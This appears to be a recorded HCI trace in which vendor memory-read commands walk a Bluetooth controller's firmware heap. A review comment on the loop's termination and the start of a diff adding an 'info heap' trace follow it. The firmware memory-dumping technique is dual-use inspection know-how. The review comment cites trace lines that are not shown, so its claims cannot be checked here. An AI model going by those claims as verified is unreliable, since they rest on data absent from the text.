RX 014dfc050c17220004
RX 0000000b0000000b0000000300000000
RX 00e269c200f6f966
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc0538ec200030
RX 00000009000000090000000200000000
RX 00e269c200f76de0
RX 014dfc0538ec200030
RX 0000003700000037000000030000000000e269c200f7757d
RX 040e34014dfc00434f4c42000000000f0000000f000000541b2200541b22009402000028000000000000000000000068ec2000585e2000
TX 0108004dfc05541b220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00f8133d
RX 014dfc05541b220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200f83a20
RX 04
RX 0e08014dfc00801b2200
TX 0108004dfc05801b220004
RX 0000000900000009000000020000000000e269c200f909ee
RX 014dfc05801b220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200f935e2
RX 04
RX 0e08014dfc00ac1b2200
TX 0108004dfc05ac1b220004
RX 0000000900000009000000020000000000e269c2
RX 00fb146c
RX 014dfc05ac1b220004
RX 0000000b
RX 0000000b00000003
RX 0000000000e269c200fb4327
RX 040e08014dfc00d81b2200
TX 0108004dfc05d81b220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00fd0682
RX 014dfc05d81b220004
RX 0000000b0000000b0000000300000000
RX 00e269c200fd3fca
RX 04
RX 0e08014dfc00041c2200
TX 0108004dfc05041c220004
RX 00000009000000090000000200000000
RX 00e269c200fe7d8e
RX 01
RX 4dfc05041c220004
RX 0000000b0000000b00000003
RX 0000000000e269c200feb0d4
RX 040e08014dfc00301c2200
TX 0108004dfc05301c220004
RX 0000000900000009000000020000000000e269c2
RX 010074cc
RX 014dfc05301c220004
RX 0000000b0000000b0000000300000000
RX 00e269c20100a76b
RX 04
RX 0e08014dfc005c1c2200
TX 0108004dfc055c1c220004
RX 0000000900000009000000020000000000e269c20101eacb
RX 014dfc055c1c220004
RX 0000000b0000000b0000000300000000
RX 00e269c201021779
RX 04
RX 0e08014dfc00881c2200
TX 0108004dfc05881c220004
RX 0000000900000009000000020000000000e269c20103e6c3
RX 014dfc05881c220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201041515
RX 04
RX 0e08014dfc00b41c2200
TX 0108004dfc05b41c220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 01055aa2
RX 014dfc05b41c220004
RX 0000000b0000000b0000000300000000
RX 00e269c201058f0e
RX 040e08014dfc00e01c2200
TX 0108004dfc05e01c220004
RX 000000090000000900000002
RX 0000000000e269c201075199
RX 014dfc05e01c220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201078a8c
RX 04
RX 0e08014dfc000c1d2200
TX 0108004dfc050c1d220004
RX 0000000900000009000000020000000000e269c2
RX 010948a2
RX 014dfc050c1d220004
RX 0000000b0000000b0000000300000000
RX 00e269c201097c0d
RX 04
RX 0e08014dfc00381d2200
TX 0108004dfc05381d220004
RX 0000000900000009
RX 000000020000000000e269c2010ac2b3
RX 014dfc05381d220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c2010afeef
RX 04
RX 0e08014dfc00641d2200
TX 0108004dfc05641d220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 010cbc41
RX 014dfc05641d220004
RX 0000000b0000000b00000003
RX 0000000000e269c2010cefe5
RX 040e08014dfc00901d2200
TX 0108004dfc05901d220004
RX 00000009000000090000000200000000
RX 00e269c2010e2df1
RX 01
RX 4dfc05901d220004
RX 0000000b0000000b00000003
RX 0000000000e269c2010e61ea
RX 040e08014dfc00bc1d2200
TX 0108004dfc05bc1d220004
RX 000000090000000900000002
RX 0000000000e269c20110231e
RX 014dfc05bc1d220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201105c92
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc0568ec200030
RX 0000000900000009000000020000000000e269c2
RX 01119816
RX 014dfc0568ec200030
RX 00000037000000370000000300000000
RX 00e269c20111c667
RX 04
RX 0e34014dfc00434f4c42000000000f0000000f000000e81d2200e81d22001c020000200000000000000000000000c85d200038ec2000
TX 0108004dfc05e81d220004
RX 00000009000000090000000200000000
RX 00e269c201138f25
RX 01
RX 4dfc05e81d220004
RX 0000000b0000000b
RX 000000030000000000e269c20113c768
RX 040e08014dfc000c1e2200
TX 0108004dfc050c1e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 011507e7
RX 014dfc050c1e220004
RX 0000000b0000000b0000000300000000
RX 00e269c201153d26
RX 04
RX 0e08014dfc00301e2200
TX 0108004dfc05301e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 0116fe0e
RX 014dfc05301e220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201173734
RX 04
RX 0e08014dfc00541e2200
TX 0108004dfc05541e220004
RX 0000000900000009000000020000000000e269c20118f296
RX 014dfc05541e220004
RX 0000000b0000000b
RX 000000030000000000e269c2011926ef
RX 040e08014dfc00781e2200
TX 0108004dfc05781e220004
RX 0000000900000009000000020000000000e269c2011a6bbe
RX 014dfc05781e220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c2011a9958
RX 04
RX 0e08014dfc009c1e2200
TX 0108004dfc059c1e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 011c676b
RX 014dfc059c1e220004
RX 0000000b0000000b00000003
RX 0000000000e269c2011c9b6e
RX 040e08014dfc00c01e2200
TX 0108004dfc05c01e220004
RX 0000000900000009000000020000000000e269c2
RX 011dda94
RX 014dfc05c01e220004
RX 0000000b0000000b0000000300000000
RX 00e269c2011e0829
RX 04
RX 0e08014dfc00e41e2200
TX 0108004dfc05e41e220004
RX 0000000900000009000000020000000000e269c2011fd393
RX 014dfc05e41e220004
RX 0000000b0000000b
RX 0000000300000000
RX 00e269c201200234
RX 040e08014dfc00081f2200
TX 0108004dfc05081f220004
RX 0000000900000009000000020000000000e269c2
RX 012145f7
RX 014dfc05081f220004
RX 0000000b0000000b0000000300000000
RX 00e269c20121a431
RX 04
RX 0e08014dfc002c1f2200
TX 0108004dfc052c1f220004
RX 000000090000000900000002
RX 0000000000e269c201230eec
RX 014dfc052c1f220004
RX 0000000b0000000b0000000300000000
RX 00e269c201231658
RX 040e08014dfc00501f2200
TX 0108004dfc05501f220004
RX 0000000900000009
RX 000000020000000000e269c20124484f
RX 014dfc05501f220004
RX 0000000b0000000b0000000300000000
RX 00e269c201244f7a
RX 040e08014dfc00741f2200
TX 0108004dfc05741f220004
RX 00000009
RX 00000009000000020000000000e269c201250543
RX 01
RX 4dfc05741f220004
RX 0000000b0000000b000000030000000000e269c2
RX 01250d7b
RX 040e08014dfc00981f2200
TX 0108004dfc05981f220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 0125e492
RX 014dfc05981f220004
RX 0000000b0000000b00000003
RX 0000000000e269c201260ab3
RX 040e08014dfc00bc1f2200
TX 0108004dfc05bc1f220004
RX 0000000900000009000000020000000000e269c2
RX 01276da0
RX 014dfc05bc1f220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201279c46
RX 040e08014dfc00e01f2200
TX 0108004dfc05e01f220004
RX 0000000900000009000000020000000000e269c2
RX 0128e461
RX 014dfc05e01f220004
RX 0000000b0000000b00000003
RX 0000000000e269c2012914b3
RX 040e08014dfc0000000000
Socket closed
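Review bot: missing documentation of the termination condition of this heap walk. The pool list it follows is circular: the first pool address comes from "RX 040e08014dfc00c85d2000" (answer to TX 0108004dfc059430200004), and the last 0x30-byte pool header read in the trace ("RX 0e34014dfc00434f4c42...c85d200038ec2000") ends with the next pointer c85d2000, i.e. that same first pool at 0x205dc8. The trace stops after the final block read returns a null pointer ("RX 040e08014dfc0000000000") and never re-reads 0x205dc8, so whatever recorded it bounded the loop by detecting the revisit, not by a null next pointer. Add a second comment line at the top stating the pool count and that the walk ends when the first pool is reached again, so that anyone re-recording the trace on other firmware knows a null check alone would loop forever.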
@@ -0,0 +1,747 @@
# info heap
TX 01011000
RX 0000000f0000000f000000030000000000e27beebf93dd9f
RX 040e0c01011000094f01090f001a41
TX 014dfc057c06200004
RX 0000000b0000000b000000030000000000e27beebf9481eb
RX 040e08014dfc009c062000
TX 014dfc059c06200030
RX 0000003700000037000000030000000000e27beebf94e223
RX 040e34014dfc00bc06200020006000782a2100b82a21005f02047300000000000000005c00b8ebdc06200060003e007836210078362100
TX 014dfc05782a210004
RX 0000000b0000000b000000030000000000e27beebf951eb3
RX 040e08014dfc00f82a2100
TX 014dfc059c2a210004
RX 0000000b0000000b000000030000000000e27beebf955ded
RX 040e08014dfc003f700000
TX 014dfc05c02a210004
RX 0000000b0000000b000000030000000000e27beebf95a038
RX 040e08014dfc000e08014d
TX 014dfc05e42a210004
RX 0000000b0000000b000000030000000000e27beebf95ddda
RX 040e08014dfc00cc118300
TX 014dfc05082b210004
RX 0000000b0000000b000000030000000000e27beebf960919